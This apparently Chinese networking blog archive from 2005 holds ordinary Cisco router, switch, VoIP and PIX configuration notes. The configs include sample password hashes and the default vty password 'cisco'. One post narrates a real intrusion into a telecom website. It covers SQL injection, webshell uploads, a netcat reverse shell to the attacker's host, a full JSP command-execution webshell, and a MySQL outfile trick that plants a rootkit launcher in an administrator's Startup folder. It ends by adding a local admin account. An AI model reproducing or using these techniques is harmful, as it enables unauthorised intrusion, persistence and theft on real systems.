2005年07月27日

一、 基本路由器的检验命令

show version

show processes

show protocols

show mem

show ip route

show startup-config

show running-config

show flash

>show interfaces

二、 基本路由配置命令

进入:config terminal/memory/network

配置网络时常采用的命令:copy和load

1. 标识:hostname 标识名

2. 启动标识:banner 启动标识

3. 接口:interface 端口号

4. 密码:line 0 6

login

passwd 口令

enable password/secret 口令

5. 接口:

1)配置端口

interface 端口号

clock rate 时钟速率(64000)/* 在串口中配置 */

bandwidth 带宽(缺省56) /* 在串口中配置 */

media-type 介质类型 /* 在以太网口上 */

early-token release /* 在令牌环网口上 */

ring-speed 16 /* 在令牌环网口上 */

no shutdown

write memory

2)检验端口

show interfaces

show controllers

6. 配置环境

1) 引导方式

boot system flash IOS-filename

boot system tftp IOS-filename tftp-address

boot system rom

2) 配置Register值

config-register 0×2102

7. 查看邻居路由

show cdp interface

show cdp neighbors [detail]

show cdp entry routerA

8. IP Address 配置

Ip address 网络地址 掩码

Ip host 主机名 address

Ip name-server 服务器地址1 服务器地址2 。。。

Ip domain-lookup nsap

Show hosts

Ping 主机名/IP地址

Trace 主机名/IP地址

[page]
三、 IP 路由

1. 静态路由

ip routing

ip route 目标网络号 掩码 端口号 [permanent]

2. 缺省路由

ip default-network 网络号

3. 动态路由

1) RIP配置

Router rip

Network 网络号

Show ip route

Show ip protocol

Debug ip

2) OSPF 配置

Router ospf 进程号

Redistribute 其它路由协议

Network 端口网络 反掩码 area 区域号

Area 区域号 range 网络号 掩码

Area 区域号 default-cost 花销值

Ip ospf priority number

Ip ospf cost 花销值

Show ip ospf database

3) BGP 配置

Router bgp 自治域号

Redistribute 其它路由协议

Network 网络号 /* 自治域内 */

Aggregate-address 网络号 掩码 summary-only 汇总网络

Neighbor 相邻网络号 remote-as 自治域号 /* 自治域间的网络 */

四、 流量控制

1) 被动端口

passive interface 端口号

2) 缺省路由

ip default 网络号/端口网络

3) 静态路由

ip route 目标网络号 掩码 端口号

4)ACL过滤表

(全局上) access-list 访问号1 {permit|deny} 反掩码号 [ established]

access-list 访问号2 {permit|deny} IP/TCP协议 源网络 目的网络

操作符 参数

(端口上)access-group 访问号 in|out

distribute-list 访问号 in|out 端口号

4) Null 0 interface

Ip route address mask null 0

[page]
五、 广义网配置

1) PPP

Ppp pap sent-usename 封装

Ppp chap hostname

Ppp chap password

2)X.25

encapsulation x25 [dce]

x25 address

x25 map 协议地址 /*SVC */

x25 pvc pvc号 ip地址 x25地址 /*PVC */

ip switching

x25 route x.121地址 接口 x.121映射地址

2) FrameRelay

Frame-relay local-dlci IP网络号

Frame-relay map 协议地址

Frame-relay lmi-type ansi

2005年07月26日

作者:mecca_gs 

下面是一个Cisco 3640的VOIP配置,对方的结构是北京和汕头两地做VoIP,后接阿尔卡特的PBX。 这里面有很多值得注意的地方,与大家一起分享快乐!

北京一方的3640配置:
Beijing#sh run
Building configuration…

Current configuration:
!
version 12.0
service timestamps debug uptime(设定Debug跟踪日志显示其时间)
service timestamps log uptime(设定看Log时显示其时间)
no service password-encryption(口令不加密)
!
hostname Beijing(主机名)
!
enable secret 5 $1$R.66$z.BUjhNsJcIr8KCcS9uxG.
!
!
!
!
!
voice-card 1(定义语音卡1)
!
voice-card 3(定义语音卡3)
!
ip subnet-zero
no ip domain-lookup
!
isdn voice-call-failure 0
!
!
!
!
controller E1 1/0(配置 E1语音卡)
framing NO-CRC4
ds0-group 0 timeslots 1-15,17-31 type e&m-wink-start(定义语音卡的类型为E&M卡)
cas-custom 0
!
controller E1 3/0(配置 E1语音卡)
framing NO-CRC4
ds0-group 0 timeslots 1-15,17-31 type e&m-wink-start(定义语音卡的类型为E&M卡)
cas-custom 0
!
!
!
interface BRI0/0
no ip address
no ip directed-broadcast
shutdown
isdn guard-timer 0 on-expiry accept
!
interface FastEthernet0/0
no ip address
no ip directed-broadcast
shutdown
duplex auto
speed auto
!
interface Serial0/0
description "Link to MainLand_Shantou by NCIC lease line"
ip address 192.168.1.1 255.255.255.252
no ip directed-broadcast
no ip mroute-cache
no fair-queue
!
interface Serial0/1
no ip address
no ip directed-broadcast
shutdown
clockrate 2000000
!
ip classless
no ip http server
!
!
voice-port 1/0:0(配置模拟语音端口)
compand-type a-law
!
voice-port 3/0:0(配置模拟语音端口)
compand-type a-law
!
dial-peer voice 1 voip (定义拨号对等体到语音)
destination-pattern +445…(为拨号对等体分配电话号码,其中.为通配符)
session target ipv4:192.168.1.2(定义Voip路由,为对端的IP地址)
req-qos guaranteed-delay (语音数据流RVSP的保证,其中Guaranteed-dealy可用于保证整个网络的延时)
ip precedence 5(IP优先级,5为关键)
!
dial-peer voice 2 pots(定义拨号对等体到语音物理端口)
destination-pattern +3…(定义电话话码以3开头的)
port 1/0:0(定义语音端口)
!
dial-peer voice 3 pots(定义拨号对等体到语音物理端口)
destination-pattern +3…(定义电话话码以3开头的)
port 3/0:0(定义语音端口)
!
!
line con 0(设定登陆)
transport input none
line aux 0
line vty 0 4(允许用Telnet)
password cisco(口令为Cisco)
login
!
end

Beijing#

汕头一方的3640配置
Shantou#sh run
Building configuration…
Current configuration:
!
version 12.0
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Shantou
!
enable secret 5 $1$dB/c$tnrMU9IxFCJdix5ssHAdH/
!
!
!
!
!
voice-card 1
!
voice-card 2
!
ip subnet-zero
no ip domain-lookup
!
isdn voice-call-failure 0
!
!
!
!
controller E1 1/0
framing NO-CRC4
ds0-group 0 timeslots 1-15,17-31 type e&m-immediate-start
cas-custom 0
!
controller E1 2/0
framing N
ds0-group 0 timeslots 1-15,17-31 type e&m-immediate-start
cas-custom 0
!
!
!
interface BRI0/0
no ip address
no ip directed-broadcast
encapsulation ppp
isdn guard-timer 0 on-expiry accept
ppp multilink
!
interface FastEthernet0/0
no ip address
no ip directed-broadcast
shutdown
duplex auto
speed auto
!
interface Serial0/0
no ip address
no ip directed-broadcast
no ip mroute-cache
shutdown
no fair-queue
clockrate 2000000
!
interface Serial0/1
ip address 192.168.1.2 255.255.255.252
no ip directed-broadcast
!
ip classless
!
no ip http server
!
!
voice-port 1/0:0
compand-type a-law
!
voice-port 2/0:0
compand-type a-law
!
dial-peer voice 20 voip
destination-pattern +3…
session target ipv4:192.168.1.1
req-qos guaranteed-delay
ip precedence 5
!
dial-peer voice 10 pots
destination-pattern +448…
port 1/0:0
!
dial-peer voice 30 voip
destination-pattern +4…
session target ipv4:192.168.1.1
req-qos guaranteed-delay
ip precedence 5
!
dial-peer voice 40 pots
destination-pattern +449…
port 2/0:0
!
!
line con 0
transport input none
line aux 0
line vty 0 4
password cisco
login
!
end

Shantou#

作者:yuyeyo 

        最常用的对端口安全的理解就是可根据MAC地址来做对网络流量的控制和管理,比如MAC地址与具体的端口绑定,限制具体端口通过的MAC地址的数量,或者在具体的端口不允许某些MAC地址的帧流量通过。稍微引申下端口安全,就是可以根据802.1X来控制网络的访问流量。
首先谈一下MAC地址与端口绑定,以及根据MAC地址允许流量的配置。
1.MAC地址与端口绑定,当发现主机的MAC地址与交换机上指定的MAC地址不同时,交换机相应的端口将down掉。当给端口指定MAC地址时,端口模式必须为access或者Trunk状态。
3550-1#conf t
3550-1(config)#int f0/1
3550-1(config-if)#switchport mode access /指定端口模式。
3550-1(config-if)#switchport port-security mac-address 00-90-F5-10-79-C1 /配置MAC地址。
3550-1(config-if)#switchport port-security maximum 1 /限制此端口允许通过的MAC地址数为1。
3550-1(config-if)#switchport port-security violation shutdown /当发现与上述配置不符时,端口down掉。

2.通过MAC地址来限制端口流量,此配置允许一TRUNK口最多通过100个MAC地址,超过100时,但来自新的主机的数据帧将丢失。
3550-1#conf t
3550-1(config)#int f0/1
3550-1(config-if)#switchport trunk encapsulation dot1q
3550-1(config-if)#switchport mode trunk /配置端口模式为TRUNK。
3550-1(config-if)#switchport port-security maximum 100 /允许此端口通过的最大MAC地址数目为100。
3550-1(config-if)#switchport port-security violation protect /当主机MAC地址数目超过100时,交换机继续工作,但来自新的主机的数据帧将丢失。

上面的配置根据MAC地址来允许流量,下面的配置则是根据MAC地址来拒绝流量。

1.此配置在Catalyst交换机中只能对单播流量进行过滤,对于多播流量则无效。
3550-1#conf t
3550-1(config)#mac-address-table static 00-90-F5-10-79-C1 vlan 2 drop /在相应的Vlan丢弃流量。
3550-1#conf t
3550-1(config)#mac-address-table static 00-90-F5-10-79-C1 vlan 2 int f0/1 /在相应的接口丢弃流量。

最后说一下802.1X的相关概念和配置。
802.1X身份验证协议最初使用于无线网络,后来才在普通交换机和路由器等网络设备上使用。它可基于端口来对用户身份进行认证,即当用户的数据流量企图通过配置过802.1X协议的端口时,必须进行身份的验证,合法则允许其访问网络。这样的做的好处就是可以对内网的用户进行认证,并且简化配置,在一定的程度上可以取代Windows 的AD。
配置802.1X身份验证协议,首先得全局启用AAA认证,这个和在网络边界上使用AAA认证没有太多的区别,只不过认证的协议是802.1X;其次则需要在相应的接口上启用802.1X身份验证。(建议在所有的端口上启用802.1X身份验证,并且使用radius服务器来管理用户名和密码)
下面的配置AAA认证所使用的为本地的用户名和密码。
3550-1#conf t
3550-1(config)#aaa new-model /启用AAA认证。
3550-1(config)#aaa authentication dot1x default local /全局启用802.1X协议认证,并使用本地用户名与密码。
3550-1(config)#int range f0/1 -24
3550-1(config-if-range)#dot1x port-control auto /在所有的接口上启用802.1X身份验证。

后记
    通过MAC地址来控制网络的流量既可以通过上面的配置来实现,也可以通过访问控制列表来实现,比如在Cata3550上可通过700-799号的访问控制列表可实现MAC地址过滤。但是利用访问控制列表来控制流量比较麻烦,似乎用的也比较少,这里就不多介绍了。
通过MAC地址绑定虽然在一定程度上可保证内网安全,但效果并不是很好,建议使用802.1X身份验证协议。在可控性,可管理性上802.1X都是不错的选择。

2005年07月23日

Pix515E防火墙配置
pixfirewall>en
pixfirewall#conf ter
pixfirewal(config)#
pixfirewal (config)#interface ethernet0 auto 激活e0口
pixfirewal (config)#interface ethernet1 auto 激活e1 口
pixfirewal (config)#nameif ethernet0 outside security0 outside是指外部接口
pixfirewal (config)#nameif ethernet1 inside security100 inside是指内部接口
pixfirewal (config)#ip address inside 10.11.45.1 255.255.255.0 配置内网口IP地
pixfirewal (config)#ip address outside218.52.57.82 255.255.248.0 配置外网 口IP 地址
pixfirewal (config)#access-list 100 permit any any 建立访问控制列表 定义都能访问
pixfirewal (config)# access-group acl 100 in interface outside 在外部网络接口上绑定名称为100的访问控制列表。
pixfirewal (config)# nat (inside) 1 10.11.45.0 255.255.255.0 表示把所有网络地址为10.11.45.0,子网掩码为255.255.255.0的主机地址定义为1号NAT地址组
pixfirewal (config)# global (outside) 1 218.52.57.83-218.52.57.86 netmask 255.255.255.0 将上述nat命令所定的内部IP地址组转换成218.52.57.83-218.12.47.86的外部地址池中的外部IP地址
pixfirewal (config)#static (inside,outside) 218.12.47.86 192.168.0.2 将内网地址192.168.0.2 映射到218.12.47.86 这个外网地址上面
pixfirewal (config)#conduit permit tcp host 218.52.57.86 eq www any 建立一个通道允许外网访问此外网的www 也就是80 端口
pixfirewal (config)#route outside 0.0.0.0 0.0.0.0 218.52.57.81
pixfirewal (config)#telnet 192.168.0.2 255.255.255.0 inside 允许内网地192.168.0.2通过telnet 访问pix 外网是不予允许telnet 的
pixfirewal (config)#enable password ******** 进入特权模式密码
pixfirewal (config)#password ****** telnet 密码
pixfirewal (config)#conduit permit icmp any any 允许icmp 也就是ping 包通过
pixfirewal (config)# write memory
2621路由器配置
route> en
rouote# conf ter
route(conf)#int f0/0
route(conf –if)#ip add 10.11.45.2 255.255.255.0
route(conf-if)#no sh
route(conf-if)#ip nat outside
route(conf-if)#int f0/1
route(conf-if)#no sh
route(conf-if)#ip nat inside
route(conf-if)#inf f0/1.192 进入子接口
route(conf-subif)#encapsulation dot1q 2 配置封装类型和vlan 2为vlan的id号
route(conf-subif)ip add 192.168.0.1 255.255.255.0 配置ip地址
route(conf-if)#inf f0/1.172
route(conf-subif)#encapsulation dot1q 3
route(conf-subif)#ip add 172.16.0.1 255.255.255.0
默认情况下各vlan之间是能相互访问的
route(conf)#access-list 100 deny 192.168.0.0 0.0.0.255
定义只能192.168.0.0 访问自己网段
route(conf)#access-list 100 permit ip any any
允许其他网段时间相互访问
route(conf)#access 100 permit ip host 192.168.0.1 any
允许任何主机通过192.168.0.1访问外网
route(conf)#ip route 0.0.0.0 0.0.0.0 10.11.45.1
route(conf)#access-list 1 permit any
route(conf)#ip nat pool rjt 10.11.46.2 10.11.45.254 netmask 255.255.255.0
route(conf)#ip nat inside source list 1 pool rjt overload

route(conf)# ip nat inside source ststic 192.168.0.2 218.12.47.83 把内网地址映射到外网
route(conf)#copy run start

路由器交换机用户名.秘密设置
route(conf)#host name #####
route(conf)#password ******
route(conf)#enable password ******
路由器用telnet
route(conf)#line vty 0 4
#login
route(conf)#password ******
route(conf-if)#ip add 192.168.1.1 255.255.255.0 se********* 为路由器某一端口配置第二个ip地址
路由器信息无法保存
conf-register 0×2102
end
write
reload
2950 交换机配置
switch> en 进入特权模式
switch# conf ter 进入配置模式
switch(conf)#interface vlan 1
switch(conf)#ip add 192.168.100.1 255.255.255.0 配置交换机ip地址
switch(vlan)# vlan datebase 进入vlan配置模式
switch(vlan)#vtp domain domain name
建立vtp域
switch(vlan)#vtp server 定义vtp类型
switch(vlan)#vlan vlan-id vlan-name 建立vlan并命名
switch(vlan)#exit
switch(conf)#interface switch-interface 进入端口配置模式
switch(conf-if)#switchport mode access 定义端口类型
switch(conf-if)#switchport access vlan vlan-id 将端口加入到vlan 中
switch(conf-if)#interface switch-interface
switch(conf-if)#switchport mode mode 配置trunk 模式
switch(conf)#enable password ******
交换机配置telnet
switch(conf)#line vty 0 4 启用远程终端
#login
switch(conf)#password ******

渗透XX电信 取得最高权限
文章作者:Andyower
在半年前,曾经入侵过**电信,当时只是留下了一个webshell就跑了,最近上来看,没了。只能重新动手了,再次郁闷中。
打开http://www.****le.com。**电信网站,随便打开个新闻
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
尝试在后面加个’,
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0′
再次再次郁闷,过滤了,返回正常页面,再次提交
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0 and 1=2

还是返回正常页面….
等等,这个链接好面熟,小生似乎在哪见过…
因为本人对这些什么文章系统都不是很认识,而且记性非常非常的差…..(一跟烟的工夫)
终于,想起,以前也入侵过相同的文章系统,哈哈,那就好办了,把以前的方法搬出来。最记得的是,密码是明文的,对于现在来说,很难得了(现在知道是什么文章系统了,叫做惠信新闻管理系统)
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343′&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
(在NewsID这个变量没有过滤,嘿嘿,记得我在一年半前,根本没有NBSI,密码帐号都是自己手工猜的,辛苦,想想现在的人真幸福….)
哈哈,出现
HTTP 500.100 – 内部服务器错误 – ASP 错误
接着提交
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343 and 1=1&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
恩!正常页面!
再次提交
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343 and 1=2&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
HTTP 500.100 – 内部服务器错误 – ASP 错误
帅,有戏了。
不可能自己再次回到原始时代吧……
把链接改一下
原来的是
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
改成
http://www.****le.com/newsxp/ReadNews.asp?BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0&NewsID=343
把NewsID=343移到的最后面,方便NBSI自动破解密码
打开NBSI,让它自动跑吧
再抽跟烟,烟抽完了,密码也出来了^_^
[id]:13 [username]:order [passwd]:leader
嘿嘿,开始找后台了
尝试
http://www.****le.com/newsxp/admin
出现:
Directory Listing Denied
This Virtual Directory does not allow contents to be listed.
目录存在
提交:
http://www.****le.com/newsxp/admin/login.asp
哈哈,出来了,要我帐号密码
把NBSI猜测出的帐号密码添进去
进去了,第一件事情,上传个webshell
太熟悉了,找到
·上传管理·
其它图文上传
因为这里,在以前我试过,可以上传任何的文件,当然包括*.asp了
找了个webshell,提交
昏!

无法找到网页
管理员把这个上传页面删除了。可恶的卑鄙的管理员,比Vanishs还卑鄙的管理员…………
没办法,在管理界面,仔细看看
看见了 文件管理
不包任何的希望,点了一下,因为在以前,那个页面被删除了
虽然这样,但是还是要试一下的
这次又郁闷了..
既然开得开这个链接
http://www.****le.com/newsxp/webedit/index.asp
又跳出个登陆框,要我输入帐号密码
但是,在下面
既然有这个东西

管理员:master 密码:123
试一下
…….
好可爱的管理员啊…
这么容易就把我放进去….


管他,马上上传去,选择好webshell,点击上传文件
&&***%&$$#$#
出现
HTTP 500.100 – 内部服务器错误 – ASP 错误

返回管理页面看看,有个跳转,输入c:\
看看能不能直接当成webshell用,结果跳出
目录中有非法字符
没办法了,只能改它文件了,直接把一个asp改成webshell,因为有编辑功能
随便找和文件,我选择的是1.asp
然后复制,在最上面有个复制的按钮,就在那个剪刀的左面
然后,在左面,随便点开个目录,我点的是admin
然后点击那个剪刀右面的粘贴的图标…
一盆冷水泼了过来,出现
HTTP 500.100 – 内部服务器错误 – ASP 错误
难道说,目录不可写?

那我找可以写的目录
images目录绝对可以写,要不然,管理员怎么上穿那么多的图片在那
跳转到/admin/images/
再次粘贴
靠!
还是
HTTP 500.100 – 内部服务器错误 – ASP 错误
没办法只能真正改写文件了
找一个不用的文件,把webshell内容写进去,然后把名字改成1.asp
/include/计数器说明.txt
呵呵,这个文件应该不会用到了吧.
记住他的时间和里面的内容先
到时候好用工具改写回来
2004-2-23 19:26:00

OK!该名成功,改成了1.asp
看来,目录是可以写的,但是,应该程序的问题
文件管理系统应该有问题,要不然,不会出现复制文件出错的.
好,现在把webshlll写进去
哈哈,写进去了,看看能不能执行
http://www.****le.com/include/1.asp
结果….
直接跳转回
http://www.****le.com/
靠!
什么玩意啊!
难道说,这个目录又不能访问?
不可能吧!
尝试同目录下的
http://www.****le.com/include/index1×1.gif
晕!可以正常显示!
难道说被杀毒软件给杀了吗?还是被杀毒软件隔离了?
不可能啊.我再次刷新,然后编辑1.asp,还是可以用的
那是什么回事?
把1.asp里面的内容改成"Andyower"看看
提交
http://www.****le.com/include/1.asp
显示
Andyower
无语了…
够绝!可恶的卑鄙的管理员,比Vanishs还卑鄙的管理员……
骂完了,舒服多了:)我发现这种发泄方式不错,哈哈,看黑防学到的.
试一下那些小木马,我就拿了冰狐浪子微型ASP后门客户端2.0测试版
把代码写进去,然后,连接!
嘿嘿!所有信息都出来了.
看来是可以运行的,好的,换个功能强大点的小木马,砍刀的.
我翻我翻翻翻!直接就看见了海洋
试一下能不能用,编辑原来的1.asp,把海洋直接粘贴进去,保存
http://www.****le.com/include/1.asp
既然可以用!
晕!难道说,ASP站长助手6.0已经被列入病毒行列了?
可怜…..
运行cmd功能看看!
netstat -an
出来了好多!没有开21,也没有开3389
看来不能用SERV-U提升权限了
还开了53端口,恐怖…..
8080开了,难道被人先入侵了?弄成了肉鸡?(后来才知道,原来是安装了resin,java开的)
翻翻他的其他盘看看,有什么可以利用的吗
发现Mysql,马上上传个php木马,试一下,能不能用默认的root登陆Mysql
又一次的失望,服务器没有装php解析器,想想,应该asp也可以直接连接MySql的吧.
google上搜索,终于发现了2篇这样的文章,因为本人很菜,所以没有成功,希望知道者可以告诉Andyower 是为什么,篇幅问题,就不列出来了.
这时,又想到,反弹一个shell,然后通过mysql.exe直接连接,能不能用root连接(3306端口已经被过滤)。
上传nc.exe 到
d:\**teleweb\include\nc.exe
在本机
nc -vv -l -p 80
在海洋的cmd里运行
d:\**teleweb\include\nc.exe -e cmd.exe -e cmd MyIp 80
一会儿,我的nc有反应了
好,开始动工
cd d:\mysql\bin
mysql.exe -u root test

运行了,结果,shell死掉了,心痛啊!本来以为这个shell不会像溢出得到的shell一样软弱的,结果,它还是光荣的倒下了.
此路不通!
再翻翻,又让我看见了个好东西
resin,是用来运行jsp的,嘿嘿!
有戏了,因为他装了Mysql,应该就是用jsp来操作的!
刚刚翻了很久,都不见有jsp文件的存在,再翻下去会累死人的!
在cmd那
dir /s d:\*.jsp
看他还不来!果真!出来了,在d:\**teleweb\question 目录!
慢慢找!说不定让我找到Mysql的密码哈哈!
可是.找了很久,连个密码的影子都不见,算了,不找了,我直接操作数据库!
找到
d:\**teleweb\question\check.jsp文件
找到关键代码
把其他不重要的,都删除.
我就留下
<%@page contentType="text/html; charset=gb2312" language="java" import="java.sql.*" import="java.util.*" import="java.io.*" import="news.ggExchange.*"%>
<jsp:useBean id="sdteledb" scope="application" class="sdteledb.sdteledb" />
<%sdteledb.setConnection();%>
<%
String sql2 = "select * from userinfo";
ResultSet rset2=sdteledb.executeQuery(sql2);
sdteledb.closeConn();
%>
然后保存成hk.jsp
以后就可以直接在 String sql2 = "";
马上在里面写Sql代码
String sql2 = "select id from userinfo into outfile ‘d:\**teleweb\question\1.txt’";
看看能不能成功
http://www.****le.com/question/hk.jsp
晕!
错误!!

500 Servlet Exception
大哥,怎么会这样的!
翻出以前的书查查看,angel是这样写的!
select * from table into outfile ‘c:/file.txt’
看清楚了,原来是反斜杠的问题!难怪啊!以前在入侵其他的php网站的时候,我从来都没有成功的into outfile过,当时我心里就一直在骂angel,上辈子一定是卖狗皮膏药的…..
现在发现是自己错了,都怪自己粗心,在这里,诚心的像angel道歉,angel对不起啦,错怪你了,原来你上辈子不是卖狗皮膏药的^_^
好,把原来的代码改过来
就直接用
select * from table into outfile ‘c:/file.txt’吧
运行
http://www.****le.com/question/hk.jsp

返回空白!马上到c盘看看
file.txt乖乖的躺在那呢,安全第一,删除!
现在该看看哪个管理员经常登陆了
net user 回车
sdweb 上次登录           2005/1/14 下午 04:21
这个管理员看来还有点勤快,就他了

嘿嘿!

ok!我马上弄个ntrootkit上去,让管理员一上线,就马上运行了.先用海洋把配置好的ntrootkit,上传到他的d:\resin目录
然后呢!
<%@page contentType="text/html; charset=gb2312" language="java" import="java.sql.*" import="java.util.*" import="java.io.*" import="news.ggExchange.*"%>
<jsp:useBean id="sdteledb" scope="application" class="sdteledb.sdteledb" />
<%sdteledb.setConnection();%>
<%
String sql2 = "CREATE TABLE shell ( shell TEXT NOT NULL );";
sdteledb.executeQuery(sql2);
sql2 = "INSERT INTO shell ( shell ) VALUES (‘d:\\\\resin\\\\ntrootkit.exe’);";
sdteledb.executeQuery(sql2);
sql2 = "SELECT * FROM shell into outfile ‘SELECT * FROM shell into outfile ‘C:\Documents and Settings\sdweb\ 「开始」菜单 \程序\启动\shell.bat’;";
sdteledb.executeQuery(sql2);
sql2 = "drop TABLE shell;";
sdteledb.executeQuery(sql2);
sdteledb.closeConn();
%>


关于sql2 = "INSERT INTO shell ( shell ) VALUES (‘d:\\\\resin\\\\ntrootkit.exe’);";
这里,为什么要在路径那加4个"\"的问题,我刚刚开始的时候,测试过了,加1个到3个,都不能正确插入"d:\resin\ntrootkit.exe"到表里,而按照我写的,shell.bat里面的内容是
d:\\resin\\ntrootkit.exe

虽然多了一个"\",但是还是可以正确运行的.
剩下的时间,就是等待了,等待管理员的重新启动再登陆.
这个时候,无聊中,想起lcx大哥和pinkeyes大哥写的一篇文章,他们在Linux下直接用个jsp木马就可以得到root,不知道在windows下是不是也可以呢,如果可以的话,那可以就不用等待了!马上,翻出jsp的木马.
编辑d:\**teleweb\question\hk.jsp
把下面的代码写进去
<%@ page import="java.io.*" %>
<%
  try {
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
          out.print((char)c);
        }
        in.close();
        try {
          child.waitFor();
        } catch (InterruptedException e) {
          e.printStackTrace();
        }
    } catch (IOException e) {
        System.err.println(e);
    }
%>

提交
http://www.****le.com/question/hk.jsp?cmd=net%20user%20Andyower%201111%20/add
图5


再提交
http://www.****le.com/question/hk.jsp?cmd=net%20LOCALGROUP%20Administrators%20Andyower%20/add

成功!
在海洋的cmd里
net user Andyower
看看


看见没有?
admin权限的啊!
真想不到jsp在windows下也是用那么高的权限运行的!
文章到这就结束了,后面的事情就简单了.也不想进一步的入侵了.毕竟,我可不想被抓去坐牢,我还年轻^=^
后记:翻文件的时候,我看见了**电信的论坛是动网的,而且数据库默认没改,虽然论坛不能正常进入,但是还是可以下载数据库.新闻系统的默认数据库也没有改.



补:这也是以前写的东西了,哎。。。技术不行……就一直保留着到了现在.
本来是有图片的,但是没有地方放,就只能算了…

2005年07月22日

来自cisco官方网站
ip default-gateway

ip default-network

and ip route 0.0.0.0 0.0.0.0

ip default-gateway

The ip default-gateway command differs from the other two commands. It should only be used when ip routing is disabled on the Cisco router.

For instance, if the router is a host in the IP world, you can use this command to define a default gateway for it. You might also use this command when your low end Cisco router is in boot mode in order to TFTP a Cisco IOS? Software image to the router. In boot mode, the router does not have ip routing enabled.

This example defines the router on IP address 172.16.15.4 as the default route:

ip default-gateway 172.16.15.4

ip default-network

Unlike the ip default-gateway command, you can use ip default-network when ip routing is enabled on the Cisco router. When you configure ip default-network the router considers routes to that network for installation as the gateway of last resort on the router.

For every network configured with ip default-network, if a router has a route to that network, that route is flagged as a candidate default route. This network diagram displays the routing table taken from router 2513:


2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S    198.10.1.0/24 [1/0] via 161.44.192.2

Note the static route to 198.10.1.0 via 161.44.192.2 and that the gateway of last resort is not set. If you configure ip default-network 198.10.1.0, the routing table changes to this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
R1#
2513#show ip protocols
2513#

The gateway of last resort is now set as 161.44.192.2. This result is independent of any routing protocol, as shown by the show ip protocols command at the bottom of the output.

You can add another candidate default route by configuring another instance of ip default-network:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
2513(config)#ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#ip default-network 171.70.24.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S       171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

After the ip default-network command was entered in the output above, the network was not flagged as a default network. The Flag a Default Network section explains why.

Flag a Default Network

Note:?/B>The ip default-network command is classful. This means that if the router has a route to the subnet indicated by this command, it installs the route to the major net. At this point neither network has been flagged as the default network. The ip default-network command must be issued again, using the major net, in order to flag the candidate default route.

2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
